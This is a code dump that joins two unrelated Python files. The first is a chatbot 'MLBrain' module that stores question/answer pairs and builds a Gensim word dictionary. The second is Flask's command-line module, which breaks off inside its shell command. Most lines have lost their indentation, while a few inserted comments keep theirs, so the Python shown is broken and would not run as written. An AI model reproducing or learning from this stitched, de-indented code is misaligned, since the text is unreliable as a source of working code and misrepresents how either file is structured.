class GensimDictionary(object):
def __init__(self, dictionary_data_root_dir, dictionary_filename, remove_stop_words=True, stop_words=None):
self.dict_filename = dictionary_filename
self.remove_stop_words = remove_stop_words
self.stop_words = stop_words
if not os.path.exists(dictionary_filename):
print(" | Generating dictionary from file %s..." % dictionary_data_root_dir)
self.dictionary = corpora.Dictionary(iter_dictionary_documents(dictionary_data_root_dir, remove_stop_words, stop_words))
self.dictionary.filter_extremes(no_below=0, no_above=0.1, keep_n=10000000)
# self.dictionary.compactify()
self.saveDictionary()
self.loadDictionary()
def saveDictionary(self):
self.dictionary.save(self.dict_filename)
def loadDictionary(self):
self.dictionary = corpora.Dictionary.load(self.dict_filename)
def addWords(self, textArray):
global wordTokenizer
documentsToAdd = []
for document in textArray:
text = ' '.join(document.strip().lower().split('\n'))
tokens = wordTokenizer.tokenize(text)
if self.remove_stop_words is True:
stopped_tokens = [i for i in tokens if not i in self.stop_words]
else:
stopped_tokens = tokens
documentsToAdd.append(stopped_tokens)
self.dictionary.add_documents(documentsToAdd, prune_at=None)
def getDictionary(self):
return self.dictionary
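# Minimal usage sketch for GensimDictionary (never called here). The paths
# below are placeholders; in MLBrain they come from the bender-training
# section of the configuration file.
def _example_build_dictionary():
    stop_words = get_stop_words('en')
    dict_manager = GensimDictionary('/tmp/dictionary-data', '/tmp/dictionary.dict',
                                    remove_stop_words=True, stop_words=stop_words)
    # New texts can be folded into the dictionary at runtime
    dict_manager.addWords([u'how do I reset my password'])
    dict_manager.saveDictionary()
    return dict_manager.getDictionary()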
"""
Class MLBrain as described at:
https://wiki.ml.de/display/DJ/Bender+Brain
Copyright (c) 2019 Imdat Solak
All Rights Reserved
Created: 2017-04-29 10:32 CET, ISO
"""
class MLBrain(MLBenderModule):
def __init__(self, configDictionary):
super(MLBrain, self).__init__(configDictionary)
self.profile = {
"name" : "mlbrain-module",
"class" : "mlbrain"
}
self.nlp_module = None
self.concept_module = None
self.data_storage_path = utils.getKeyFromSectionInConfiguration('brain', 'data_storage_path', None, configDictionary)
self.dictionary_data_source_path = utils.getKeyFromSectionInConfiguration('bender-training', 'dictionary_data_source_path', None, configDictionary)
self.dictionary_output_path = utils.getKeyFromSectionInConfiguration('bender-training', 'dictionary_output_path', None, configDictionary)
if self.dictionary_output_path == None:
print('**** ERROR: No Dictionary output path defined in bender-training section of config-file.')
sys.exit(1)
self.dict_filename = os.path.join(self.dictionary_output_path, 'dictionary.dict')
        # cast to bool so that the downstream "is True" checks behave as intended
        self.remove_stop_words = bool(int(utils.getKeyFromSectionInConfiguration('bender-training', 'remove_stop_words', '0', configDictionary)))
self.language = utils.getKeyFromSectionInConfiguration('bender-training', 'data_language_short', 'en',configDictionary)
self.stop_words = get_stop_words(self.language)
utils.safe_create_directory(self.dictionary_output_path)
if self.data_storage_path == None:
print('**** ERROR: No data storage path specified. Exiting!')
sys.exit(1)
self.dictionary_manager = GensimDictionary(self.dictionary_data_source_path, self.dict_filename, self.remove_stop_words, self.stop_words)
self._loadData()
def initForBender(self, benderInstance):
self.benderCore = benderInstance
def _text_as_index(self, text):
global wordTokenizer
q = ' '.join(text.lower().split('\n'))
qArr = wordTokenizer.tokenize(q)
q = ' '.join(qArr)
return hashlib.sha256(q).hexdigest()
def _question_as_index(self, question):
return self._text_as_index(question)
def _answer_as_index(self, answer):
return self._text_as_index(answer)
def _addNewQAPair(self, question, answer, qType='e', qCategory = 1, mcugAnswers = {}):
"""
        Same as 'batchAddNewQAPairs', except it works on a single QA-pair:
        'question' is a dict with at least a 'question' key, 'answer' is the answer text
"""
if question != None and answer != None:
newQuestion = question
appendQuestion = False
appendAnswer = False
qIndexHash = self._question_as_index(question['question'])
if qIndexHash in self.questions_indexed.keys():
newQuestionID = self.questions_indexed[qIndexHash]
else:
newQuestionID = len(self.questions)
appendQuestion = True
aIndexHash = self._answer_as_index(answer)
            # Do we already have the answer stored?
if aIndexHash in self.answers_indexed.keys():
# Yes, then throw away the data and just retrieve existing index
newAnswerID = self.answers_indexed[aIndexHash]
else:
# No? then we need to add it
newAnswerID = len(self.answers)
appendAnswer = True
if mcugAnswers == None:
mcugAnswers = {}
if appendQuestion:
newQuestion = question
newQuestion['answers'] = [newAnswerID]
newQuestion['qType'] = qType
newQuestion['category'] = qCategory
newQuestion['qID'] = newQuestionID
if 'answerID' in newQuestion.keys():
del newQuestion['answerID']
self.questions.append(newQuestion)
self.questions_indexed[qIndexHash] = newQuestionID
retAnswer = {'id': newAnswerID, 'answer': answer, 'mcugAnswers': mcugAnswers}
if appendAnswer:
self.answers.append(retAnswer)
self.answers_indexed[aIndexHash] = newAnswerID
return {newQuestionID: newQuestion}, retAnswer
else:
return None, None
def setNLPModule(self, nlpModule):
self.nlp_module = nlpModule
def setConceptModule(self, conceptModule):
self.concept_module = conceptModule
def addNewQAPair(self, questionAnswerPair, qType='e', qCategory=1, mcugAnswers={}):
brain_add_mutex.acquire()
question = {'question': questionAnswerPair[0]}
answer = questionAnswerPair[1]
qI, aI = self._addNewQAPair(question, answer, qType, qCategory, mcugAnswers)
if qI != None:
text = question['question'] + ' ' + answer
self.dictionary_manager.addWords([text])
self.dictionary_manager.saveDictionary()
self._saveData()
brain_add_mutex.release()
return qI, aI
else:
brain_add_mutex.release()
return None, None
def batchAddNewQAPairs(self, trainingData):
"""
Stores 'questions' and 'answers' in its internal storage as indexed pairs
IN:
trainingData = PICKLE Format as output by 'convert_csv.py' or similar
preparation tools
"""
questions = trainingData['questions']
answers = trainingData['defaultAnswers']
mcugAnswers = trainingData['mcugAnswers']
text = []
for question in questions:
qType = question['qType']
category = question['category']
answer = answers[question['answerID']]
mcugAnswer = mcugAnswers.get(str(question['answerID']), None)
self._addNewQAPair(question, answer, qType, category, mcugAnswer)
textLine = question['question'] + ' ' + answer
if mcugAnswer is not None:
for key in mcugAnswer.keys():
value = mcugAnswer[key]
textLine = textLine + ' ' + value
text.append(textLine)
self.dictionary_manager.addWords(text)
self.dictionary_manager.saveDictionary()
self._saveData()
return True
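    # Expected shape of 'trainingData' (inferred from the loop above; the
    # pickle produced by the preparation tools may carry additional keys):
    #   {
    #       'questions': [{'question': '...', 'qType': 'e',
    #                      'category': 1, 'answerID': 0}, ...],
    #       'defaultAnswers': ['answer text for answerID 0', ...],
    #       'mcugAnswers': {'0': {'some-client': 'client-specific answer'}, ...}
    #   }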
def _index_questions(self, questions):
result = {}
for i, entry in enumerate(questions):
hashIndex = self._question_as_index(entry['question'])
result[hashIndex] = i
return result
def _index_answers(self, answers):
result = {}
for i, entry in enumerate(answers):
hashIndex = self._answer_as_index(entry)
result[hashIndex] = i
return result
def _loadData(self):
self.questions = []
self.answers = []
self.questions_indexed = {}
self.answers_indexed = {}
data_file = os.path.join(self.data_storage_path, 'knowledge-raw.pickle')
if os.path.exists(data_file):
knowledge = pickle.load(open(data_file, 'rb'))
self.questions = knowledge['questions']
self.answers = knowledge['answers']
data_file = os.path.join(self.data_storage_path, 'knowledge-indexed.pickle')
if os.path.exists(data_file):
knowledge = pickle.load(open(data_file, 'rb'))
self.questions_indexed = knowledge['questions']
self.answers_indexed = knowledge['answers']
else:
self.questions_indexed = self._index_questions(self.questions)
self.answers_indexed = self._index_answers(self.answers)
knowledge = {'questions': self.questions_indexed, 'answers': self.answers_indexed}
            pickle.dump(knowledge, open(data_file, 'wb'))
def _saveData(self):
# Because saving of the brain can take some time AFTER an update, we need to perform
# it in a separate thread.
# This is no problem as the thread itself is using a mutex-lock
a = []
a.extend(self.answers)
q = []
q.extend(self.questions)
qI = {}
qI.update(self.questions_indexed)
aI = {}
aI.update(self.answers_indexed)
save_thread = threading.Thread(target=save_brain_data, args=(self.data_storage_path, q, a, qI, aI))
save_thread.start()
def getAllQuestions(self):
return [qaPair['question'] for qaPair in self.questions]
def getAllAnswers(self):
return self.answers
def getAllQAPairs(self):
return self.questions
def getQuestionTexForQuestionID(self, questionID):
if questionID < len(self.questions):
return self.questions[questionID]['question']
else:
return None
def getAnswerIDsForQuestionID(self, questionID):
if questionID < len(self.questions):
return self.questions[questionID]['answers']
else:
return None
def getMCUGAnswerForQuestionID(self, questionID, client, channel=None, userGroup=None):
return None
def getMCUGAnswerForAnswerID(self, answerID, client, channel=None, userGroup=None):
return None
def getAnswerTextsForQuestionID(self, questionID):
if questionID < len(self.questions):
answerIDs = self.questions[questionID]['answers']
answers = []
for answerID in answerIDs:
answer = self.answers[answerID]
answers.append(answer['answer'])
return answers
else:
return None
def getAnswersForQuestionID(self, questionID):
if questionID < len(self.questions):
questionInfo = self.questions[questionID]
answerIDs = questionInfo['answers']
answers = []
for answerID in answerIDs:
anAnswer = self.answers[answerID]
anAnswer['qType'] = questionInfo.get('qType', 'e')
answers.append(anAnswer)
return answers
else:
return None
def getAnswerTextForAnswerID(self, answerID):
if answerID < len(self.answers):
            return self.answers[answerID]['answer']
else:
return None
def getIDForQuestionText(self, questionText):
qIndexHash = self._question_as_index(questionText)
if qIndexHash in self.questions_indexed.keys():
return self.questions_indexed[qIndexHash]
else:
return None
def getQuestionCount(self):
return len(self.questions)
def getAnswerCount(self):
return len(self.answers)
def getDictionary(self):
return self.dictionary_manager.getDictionary()
def getIndicesForText(self, text):
"""
        Returns an array of numbers representing the words, in exactly the same order as they appear in the text.
        If it encounters a word it doesn't know, the index (number) will be "-1".
        If you encounter such a word, you could first add that word to the dictionary (see "addWordsToDictionary")
        and call indicesForText again.
;text; is just a full text in UTF-8 format
"""
global wordTokenizer
text = text.lower()
returnArray = []
try:
sentences = text.strip().lower().split('\n')
except:
return None
dictionaryTokens = self.getDictionary().token2id
for sentence in sentences:
row = []
for token in wordTokenizer.tokenize(sentence):
if token in dictionaryTokens:
row.append(dictionaryTokens[token])
else:
row.append(-1)
returnArray.append(row)
return returnArray
def getTextForIndices(self, indexArray):
"""
        Returns an array of UTF-8 strings (one per sentence) representing the indices in exactly the same
        order as they appeared in the indexArray. If the array contains an index that is out of the range
        of the module's dictionary, the word in question will be "<__((UNKNOWN))__>"
;indexArray; is a two-dimensional array; 1D = sentence; 2D=words in the sentence
"""
returnArray = []
for sentence in indexArray:
newRow = ""
for i in range(len(sentence)):
wordID = sentence[i]
wordText = self.getDictionary().get(wordID, '<__((UNKNOWN))__>')
newRow = newRow + wordText + ' '
returnArray.append(newRow)
return returnArray
def getStopWordCleanedText(self, text):
global wordTokenizer
if self.remove_stop_words:
tokens = wordTokenizer.tokenize(text)
stopped_tokens = [i for i in tokens if not i.lower() in self.stop_words]
return ' '.join(stopped_tokens)
else:
return text
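# Minimal usage sketch for MLBrain (not executed anywhere). It assumes an
# already constructed MLBrain instance; the question/answer strings are
# placeholders.
def _example_brain_usage(brain):
    brain.addNewQAPair((u'how do I reset my password',
                        u'Open the settings page and click "Reset".'))
    question_id = brain.getIDForQuestionText(u'how do I reset my password')
    answers = brain.getAnswerTextsForQuestionID(question_id)
    # Round-trip between text and dictionary indices; unknown words map to -1
    indices = brain.getIndicesForText(u'how do I reset my password')
    text_again = brain.getTextForIndices(indices)
    return answers, indices, text_again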
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, itervalues, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ('app', 'application'):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [
v for v in itervalues(module.__dict__) if isinstance(v, Flask)
]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
'one.'.format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ('create_app', 'make_app'):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
'could not call it without arguments. Use '
'"FLASK_APP=\'{module}:{factory}(args)\'" to specify '
'arguments.'.format(
factory=attr_name, module=module.__name__
)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(
module=module.__name__
)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if 'script_info' in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
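# Illustrative sketch of the distinction _called_with_wrong_args makes
# (not part of Flask itself):
#
#   def factory_a():            # raises TypeError *inside* the factory
#       raise TypeError('boom')
#
#   def factory_b(required):    # TypeError comes from the call signature
#       pass
#
#   try:
#       factory_a()
#   except TypeError:
#       _called_with_wrong_args(factory_a)   # -> False (error came from inside)
#
#   try:
#       factory_b()
#   except TypeError:
#       _called_with_wrong_args(factory_b)   # -> True (the call itself failed)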
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r'^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$', app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
'expression.'.format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval('({args},)'.format(args=args))
            except (ValueError, SyntaxError) as e:
raise NoAppException(
'Could not parse the arguments in '
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
'be called with the specified arguments.'.format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
'A valid Flask application was not obtained from '
'"{module}:{app_name}".'.format(
module=module.__name__, app_name=app_name
)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
if os.path.splitext(path)[1] == '.py':
path = os.path.splitext(path)[0]
if os.path.basename(path) == '__init__':
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, '__init__.py')):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return '.'.join(module_name[::-1])
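# Worked example (illustrative paths): for '/home/user/project/pkg/app.py'
# where '/home/user/project/pkg/__init__.py' exists but '/home/user/project'
# has no '__init__.py', prepare_import() inserts '/home/user/project' at the
# front of sys.path and returns 'pkg.app'.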
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
'\n\n{tb}'.format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException(
'Could not import "{name}".'.format(name=module_name)
)
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = 'Flask %(version)s\nPython %(python_version)s'
click.echo(message % {
'version': __version__,
'python_version': sys.version,
}, color=ctx.color)
ctx.exit()
version_option = click.Option(
['--version'],
help='Show the flask version',
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
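# Usage sketch (mirrors run_command below): wrap a loader callable so the
# application is imported lazily, e.g.
#
#   info = ScriptInfo(app_import_path='hello.py')
#   app = DispatchingApp(info.load_app, use_eager_loading=False)
#
# 'app' is a WSGI callable; the Flask application is loaded in a background
# thread and import errors resurface during WSGI handling.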
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None,
set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get('FLASK_APP')
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (self.app_import_path.split(':', 1) + [None])[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ('wsgi.py', 'app.py'):
import_name = prepare_import(path)
app = locate_app(self, import_name, None,
raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
'Could not locate a Flask application. You did not provide '
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
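# Usage sketch: a plain click command that needs the application context,
# e.g. to touch ``current_app`` (illustrative names; works when invoked
# through the ``flask`` CLI so a ScriptInfo object is available):
#
#   @click.command('init-db')
#   @with_appcontext
#   def init_db_command():
#       current_app.logger.info('initializing the database')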
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
    For information as to why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
        shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(self, add_default_commands=True, create_app=None,
add_version_option=True, load_dotenv=True,
set_debug_flag=True, **extra):
params = list(extra.pop('params', None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points('flask.commands'):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ['FLASK_RUN_FROM_CLI'] = 'true'
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app,
set_debug_flag=self.set_debug_flag)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path):].lstrip(os.sep)) == other
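# Worked examples: _path_is_ancestor('/a/b', '/a/b/c') is True, while
# _path_is_ancestor('/a/b', '/a/bc') is False because rejoining yields
# '/a/b/c' rather than the original '/a/bc'.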
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile('.env') or os.path.isfile('.flaskenv'):
click.secho(
' * Tip: There are .env or .flaskenv files present.'
' Do "pip install python-dotenv" to use them.',
fg='yellow')
return
if path is not None:
return dotenv.load_dotenv(path)
new_dir = None
for name in ('.env', '.flaskenv'):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
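# Usage sketch with two illustrative files in the project root:
#
#   .env       ->  FLASK_ENV=development
#   .flaskenv  ->  FLASK_ENV=production
#                  FLASK_APP=hello.py
#
# load_dotenv() reads .env first, so FLASK_ENV stays 'development', while
# FLASK_APP is still picked up from .flaskenv; the working directory is
# changed to the directory containing the first file found.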
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += ' (lazy loading)'
click.echo(message)
click.echo(' * Environment: {0}'.format(env))
if env == 'production':
click.secho(
' WARNING: Do not use the development server in a production'
' environment.', fg='red')
click.secho(' Use a production WSGI server instead.', dim=True)
if debug is not None:
click.echo(' * Debug mode: {0}'.format('on' if debug else 'off'))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = 'path'
def __init__(self):
self.path_type = click.Path(
exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == 'adhoc':
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
'Using ad-hoc certificates requires pyOpenSSL.',
ctx, param)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7, 9):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get('cert')
is_adhoc = cert == 'adhoc'
if sys.version_info < (2, 7, 9):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.',
ctx, param)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.',
ctx, param)
if not cert:
raise click.BadParameter(
'"--cert" must also be specified.',
ctx, param)
ctx.params['cert'] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter(
'Required when using "--cert".',
ctx, param)
return value
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--cert', type=CertParamType(),
help='Specify a certificate file to use HTTPS.')
@click.option('--key',
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key, expose_value=False,
help='The key file to use when specifying a certificate.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=True,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads, cert):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(host, port, app, use_reloader=reload, use_debugger=debugger,
threaded=with_threads, ssl_context=cert)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
    namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s [%s]\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
